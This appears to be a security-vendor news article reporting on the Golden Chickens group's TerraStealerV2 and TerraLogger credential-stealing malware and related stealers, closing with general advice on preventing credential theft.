Golden Chickens Spread Malware to Steal Credentials
Golden Chickens, a known cybercrime group, has launched two new malware tools: TerraStealerV2 and TerraLogger. These tools focus on stealing sensitive user data.
According to a recent report, TerraStealerV2 targets browser credentials, crypto wallets, and extension data. TerraLogger, however, logs keystrokes using a basic keyboard hook.
Both tools reflect the group’s ongoing efforts to expand their malware-as-a-service (MaaS) offerings. Golden Chickens, also known as Venom Spider, has been active since 2018.
The group has built several tools over time. For example, they’ve developed More_eggs, TerraCrypt, VenomLNK, and TerraLoader, all designed for data theft and system access.
Researchers have linked the group to a persona called badbullzvenom. This identity appears to be run by individuals from Canada and Romania.
TerraStealerV2 spreads in various forms. These include EXEs, DLLs, MSI installers, and shortcut files. In most cases, the payload is an OCX file retrieved from an external domain.
However, this malware does not bypass newer Chrome protections. Therefore, it may still be under development or contain outdated code.
Captured data is sent to Telegram and the same delivery domain. The malware also uses trusted Windows tools like regsvr32.exe and mshta.exe to avoid detection.
TerraLogger, on the other hand, only logs keystrokes. It doesn’t send data or communicate with a control server. This suggests it may be paired with other tools in the future.
Other recent stealer malware, such as Hannibal Stealer and StealC V2, show similar goals. For instance, StealC V2 can now deliver payloads through MSI files and PowerShell, and uses RC4 encryption for better stealth.
These threats come with redesigned control panels and broader data-harvesting features. Some include geolocation targeting and Telegram bot alerts.
How to Prevent Credential Theft from Malware Attacks
To protect your systems, always update browsers, extensions, and operating systems. Outdated software leaves openings for malware like TerraStealerV2.
Use reputable antivirus tools and monitor for suspicious processes. For example, look for the misuse of Windows utilities like mshta.exe or regsvr32.exe.
Avoid downloading unknown files or clicking unverified links. Also, educate your team on phishing risks and safe online behavior. Prevention starts with awareness and action.
Sleep well, we got you covered.
